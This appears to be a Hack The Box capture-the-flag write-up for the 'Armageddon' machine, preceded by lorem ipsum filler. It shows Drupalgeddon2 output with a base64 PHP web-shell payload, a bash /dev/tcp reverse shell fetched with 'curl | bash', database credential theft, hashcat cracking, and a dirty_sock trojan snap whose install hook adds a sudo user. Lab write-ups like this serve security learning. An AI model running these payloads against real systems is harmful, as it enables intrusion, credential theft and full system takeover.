Armageddon - Hack The Box

Lorem Ipsum is simply dummy text of the printing and typesetting industry. Lorem Ipsum has been the industry’s standard dummy text ever since the 1500s, when an unknown printer took a galley of type and scrambled it to make a type specimen book. It has survived not only five centuries, but also the leap into electronic typesetting, remaining essentially unchanged. It was popularised in the 1960s with the release of Letraset sheets containing Lorem Ipsum passages, and more recently with desktop publishing software like Aldus PageMaker including versions of Lorem Ipsum.



March 30, 2021

“Lorem Ipsum is simply dummy text of the printing and typesetting industry. Lorem Ipsum has been the industry’s standard dummy text ever since the 1500s, when an unknown printer took a galley of type and scrambled it to make a type specimen book. It has survived not only five centuries, but also the leap into electronic typesetting, remaining essentially unchanged. It was popularised in the 1960s with the release of Letraset sheets containing Lorem Ipsum passages, and more recently with desktop publishing software like Aldus PageMaker including versions of Lorem Ipsum.”

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  1. [root:/git/htb]# nmap -Pn -n -sCV (master✱) Host discovery disabled (-Pn). All addresses will be marked ‘up’ and scan times will be slower. Starting Nmap 7.91 ( ) at 2021-03-29 14:51 CEST Nmap scan report for Host is up (0.028s latency). Not shown: 998 closed ports PORT STATE SERVICE VERSION 22/tcp open ssh OpenSSH 7.4 (protocol 2.0) | ssh-hostkey: | 2048 82:c6:bb:c7:02:6a:93:bb:7c:cb:dd:9c:30:93:79:34 (RSA) | 256 3a:ca:95:30:f3:12:d7:ca:45:05:bc:c7:f1:16:bb:fc (ECDSA) |_ 256 7a:d4:b3:68:79:cf:62:8a:7d:5a:61:e7:06:0f:5f:33 (ED25519) 80/tcp open http Apache httpd 2.4.6 ((CentOS) PHP/5.4.16) |http-generator: Drupal 7 ( | http-robots.txt: 36 disallowed entries (15 shown) | /includes/ /misc/ /modules/ /profiles/ /scripts/ | /themes/ /CHANGELOG.txt /cron.php /INSTALL.mysql.txt | /INSTALL.pgsql.txt /INSTALL.sqlite.txt /install.php /INSTALL.txt |/LICENSE.txt /MAINTAINERS.txt |_http-server-header: Apache/2.4.6 (CentOS) PHP/5.4.16 |_http-title: Welcome to Armageddon | Armageddon

  2. As we see ‘Drupal 7’ from the nmap output, and the box name is ‘armageddon’ - this higly suggests that the exploit used here should be drupalgeddon. First things first, we need to find the drupal version.

[root:/opt/shells/py]# droopescan — snip — [+] Possible version(s): 7.56

Download drupalgeddon2 from their github and execute to get a php shell.

[root:/git/htb/armageddon]# ./drupalgeddon.rb (master✱) [*] –==[::#Drupalggedon2::]==– ——————————————————————————– [i] Target : ——————————————————————————– [+] Found : (HTTP Response: 200) [+] Drupal!: v7.56 ——————————————————————————– [*] Testing: Form (user/password) [+] Result : Form valid - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - [*] Testing: Clean URLs [!] Result : Clean URLs disabled (HTTP Response: 404) [i] Isn’t an issue for Drupal v7.x ——————————————————————————– [*] Testing: Code Execution (Method: name) [i] Payload: echo KCZFEGTX [+] Result : KCZFEGTX [+] Good News Everyone! Target seems to be exploitable (Code execution)! w00hooOO! ——————————————————————————– [*] Testing: Existing file ( [!] Response: HTTP 200 // Size: 6. Something could already be there? - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - [*] Testing: Writing To Web Root (./) [i] Payload: echo PD9waHAgaWYoIGlzc2V0KCAkX1JFUVVFU1RbJ2MnXSApICkgeyBzeXN0ZW0oICRfUkVRVUVTVFsnYyddIC4gJyAyPiYxJyApOyB9 | base64 -d | tee shell.php [+] Result : &1' ); } [+] Very Good News Everyone! Wrote to the web root! Waayheeeey!!! -------------------------------------------------------------------------------- [i] Fake PHP shell: curl '' -d 'c=hostname' armageddon.htb>> whoami apache

Look on the drupal default configuration to see if we can find any sensitive data. armageddon.htb>> cat sites/default/settings.php — snip — $databases = array ( ‘default’ => array ( ‘default’ => array ( ‘database’ => ‘drupal’, ‘username’ => ‘drupaluser’, ‘password’ => ’CQHEy@9M*m23gBVj’, ‘host’ => ‘localhost’, ‘port’ => ’‘, ’driver’ => ‘mysql’, ‘prefix’ => ’’, ), ), );

Because we only have a semi-interactive shell we can’t use mysqldump; armageddon.htb>> mysqldump drupal -u drupaluser -p Enter password: mysqldump: Got error: 1045: “Access denied for user ‘drupaluser’@‘localhost’ (using password: NO)” when trying to connect

Trying to curl on high ports ex 4488, 4444 or 8080 results in nothing. However trying normal ports like 80 or 443 works. With this in mind, we create a bash reverse payload and setup a python http.server to trigger the reverse shell.

[root:/srv/pub-share]# echo “bash -i >& /dev/tcp/ 0>&1” > [root:/srv/pub-share]# chmod +x [root:/srv/pub-share]# python3 -m http.server 80

armageddon.htb>> curl | bash

[root:/opt/shells/py]# nc -lvnp 443 listening on [any] 443 … connect to [] from (UNKNOWN) [] 59264 bash: no job control in this shell bash-4.2$ whoami apache

  1. We now have a interactive shell and can access the mysql database, normally or dumping it.

mysqldump output A LOT of data, so going for the normal way might be the play. bash-4.2$ mysqldump drupal -u drupaluser -p — snip — – Dumping data for table users

LOCK TABLES users WRITE; /!40000 ALTER TABLE users DISABLE KEYS /; INSERT INTO users VALUES (0,’‘,’‘,’‘,’‘,’‘,NULL,0,0,0,0,NULL,’‘,0,’‘,NULL),(1,’brucetherealadmin’,‘\(S\)DgL2gjv6ZtxBo6CdqZEyJuBphBmrCqIV6W97.oOsUf1xAhaadURt’,‘’,’‘,’‘,’filtered_html’,1606998756,1607077194,1607076276,1,‘Europe/London’,’‘,0,’’,‘a:1:{s:7:"overlay";i:1;}’); /!40000 ALTER TABLE users ENABLE KEYS /; UNLOCK TABLES;

[root:/git/htb/armageddon]# echo “\(S\)DgL2gjv6ZtxBo6CdqZEyJuBphBmrCqIV6W97.oOsUf1xAhaadURt” > brucetherealadmin.hash [root:/git/htb/armageddon]# hashcat -a0 -m7900 brucetherealadmin.hash /usr/share/wordlists/rockyou.txt — snip — \(S\)DgL2gjv6ZtxBo6CdqZEyJuBphBmrCqIV6W97.oOsUf1xAhaadURt:booboo

Session……….: hashcat Status………..: Cracked Hash.Name……..: Drupal7

[root:/git/htb/armageddon]# ssh brucetherealadmin@ (master✱) brucetherealadmin@’s password: booboo Last login: Tue Mar 23 12:40:36 2021 from [brucetherealadmin@armageddon ~]$ cat user.txt 8f83a9bfe112d6b52680038b2db5eb51


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  1. Upload and run.

[root:…esome-scripts-suite/linPEAS]# python3 -m http.server 80 [brucetherealadmin@armageddon shm]$ curl -o % Total % Received % Xferd Average Speed Time Time Time Current Dload Upload Total Spent Left Speed 100 218k 100 218k 0 0 1202k 0 –:–:– –:–:– –:–:– 1207k [brucetherealadmin@armageddon shm]$ chmod +x [brucetherealadmin@armageddon shm]$ ./ — snip — [+] PATH [i] /usr/local/bin:/usr/bin:/usr/local/sbin:/usr/sbin:/var/lib/snapd/snap/bin:/home/brucetherealadmin/.local/bin:/home/brucetherealadmin/bin — snip — User brucetherealadmin may run the following commands on armageddon: (root) NOPASSWD: /usr/bin/snap install *

From Linpeas we find that we find some interesting paths, as well as we are allowed to install any snap packages. We can probably use this to elevate our privileges by creating a custom snap package.

  1. Googling around about ‘snap privesc’ one ofthe first things that comes up are dirty_sock. Reading about it, it’s only vulnerable against systems below version 2.37.1.

[brucetherealadmin@armageddon ~]$ snap version snapd 2.47.1-1.el7

And as we see from version output, the victim runs version 2.47.1 and should not be vulnerable. Downloading and running the script ( proves that. However since we have option to install, lets look through what the script does. At the very top of the script we find something very interesting:

# The following global is a base64 encoded string representing an installable # snap package. The snap itself is empty and has no functionality. It does, # however, have a bash-script in the install hook that will create a new user. # For full details, read the blog linked on the github page above. TROJAN_SNAP = (’’’ aHNxcwcAAAAQIVZcAAACAAAAAAAEABEA0AIBAAQAAADgAAAAAAAAAI4DAAAAAAAAhgMAAAAAAAD/ /////////xICAAAAAAAAsAIAAAAAAAA+AwAAAAAAAHgDAAAAAAAAIyEvYmluL2Jhc2gKCnVzZXJh ZGQgZGlydHlfc29jayAtbSAtcCAnJDYkc1daY1cxdDI1cGZVZEJ1WCRqV2pFWlFGMnpGU2Z5R3k5 TGJ2RzN2Rnp6SFJqWGZCWUswU09HZk1EMXNMeWFTOTdBd25KVXM3Z0RDWS5mZzE5TnMzSndSZERo T2NFbURwQlZsRjltLicgLXMgL2Jpbi9iYXNoCnVzZXJtb2QgLWFHIHN1ZG8gZGlydHlfc29jawpl Y2hvICJkaXJ0eV9zb2NrICAgIEFMTD0oQUxMOkFMTCkgQUxMIiA+PiAvZXRjL3N1ZG9lcnMKbmFt ZTogZGlydHktc29jawp2ZXJzaW9uOiAnMC4xJwpzdW1tYXJ5OiBFbXB0eSBzbmFwLCB1c2VkIGZv ciBleHBsb2l0CmRlc2NyaXB0aW9uOiAnU2VlIGh0dHBzOi8vZ2l0aHViLmNvbS9pbml0c3RyaW5n L2RpcnR5X3NvY2sKCiAgJwphcmNoaXRlY3R1cmVzOgotIGFtZDY0CmNvbmZpbmVtZW50OiBkZXZt b2RlCmdyYWRlOiBkZXZlbAqcAP03elhaAAABaSLeNgPAZIACIQECAAAAADopyIngAP8AXF0ABIAe rFoU8J/e5+qumvhFkbY5Pr4ba1mk4+lgZFHaUvoa1O5k6KmvF3FqfKH62aluxOVeNQ7Z00lddaUj rkpxz0ET/XVLOZmGVXmojv/IHq2fZcc/VQCcVtsco6gAw76gWAABeIACAAAAaCPLPz4wDYsCAAAA AAFZWowA/Td6WFoAAAFpIt42A8BTnQEhAQIAAAAAvhLn0OAAnABLXQAAan87Em73BrVRGmIBM8q2 XR9JLRjNEyz6lNkCjEjKrZZFBdDja9cJJGw1F0vtkyjZecTuAfMJX82806GjaLtEv4x1DNYWJ5N5 RQAAAEDvGfMAAWedAQAAAPtvjkc+MA2LAgAAAAABWVo4gIAAAAAAAAAAPAAAAAAAAAAAAAAAAAAA AFwAAAAAAAAAwAAAAAAAAACgAAAAAAAAAOAAAAAAAAAAPgMAAAAAAAAEgAAAAACAAw’’’ + ‘A’ * 4256 + ‘==’)

Lets create our own ‘TROJAN_SNAP’ by using this code.


[brucetherealadmin@armageddon ~]$ cat TROJAN_SNAP.snap hsqs!V�������������>x#!/bin/bash

useradd dirty_sock -m -p ‘\(6\)sWZcW1t25pfUdBuX$jWjEZQF2zFSfyGy9LbvG3vFzzHRjXfBYK0SOGfMD1sLyaS97AwnJUs7gDCY.fg19Ns3JwRdDhOcEmDpBVlF9m.’ -s /bin/bash usermod -aG sudo dirty_sock echo “dirty_sock ALL=(ALL:ALL) ALL” >> /etc/sudoers name: dirty-sock version: ‘0.1’ summary: Empty snap, used for exploit author: “0xPThree” description: ’See


architectures: - amd64 confinement: devmode grade: devel �YZ��7zXZi”�6�S�!�����K]j;n��Q�b3ʶ]I-�,����Hʭ�E��k�qj|��$l5K�(�y����#�Jq_ͼӡ�h�D��u������e�?U�V���þ�Xx�h#�?>0 �YZ8��<���>��[

brucetherealadmin@armageddon ~]$ sudo snap install TROJAN_SNAP.snap error: cannot find signatures with metadata for snap “TROJAN_SNAP.snap”

We encounter an error when installing because the confinement-flag ‘devmode’ is missing.

[brucetherealadmin@armageddon ~]$ sudo snap install –devmode TROJAN_SNAP.snap dirty-sock 0.1 installed

  1. Login with your new user, dirty_sock, and escalate to root by using ‘sudo -i’ and grab root.txt

[brucetherealadmin@armageddon ~]$ su dirty_sock Pa ssword: [dirty_sock@armageddon brucetherealadmin]$ whoami dirty_sock [dirty_sock@armageddon brucetherealadmin]$ cat /root/root.txt cat: /root/root.txt: Permission denied [dirty_sock@armageddon brucetherealadmin]$ sudo -i

We trust you have received the usual lecture from the local System Administrator. It usually boils down to these three things:

  #1) Respect the privacy of others.
  #2) Think before you type.
  #3) With great power comes great responsibility.

[sudo] password for dirty_sock: [root@armageddon ~]# cat /root/root.txt 2553971efae28d5233668a09ef81951b


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Snap Installation Guide: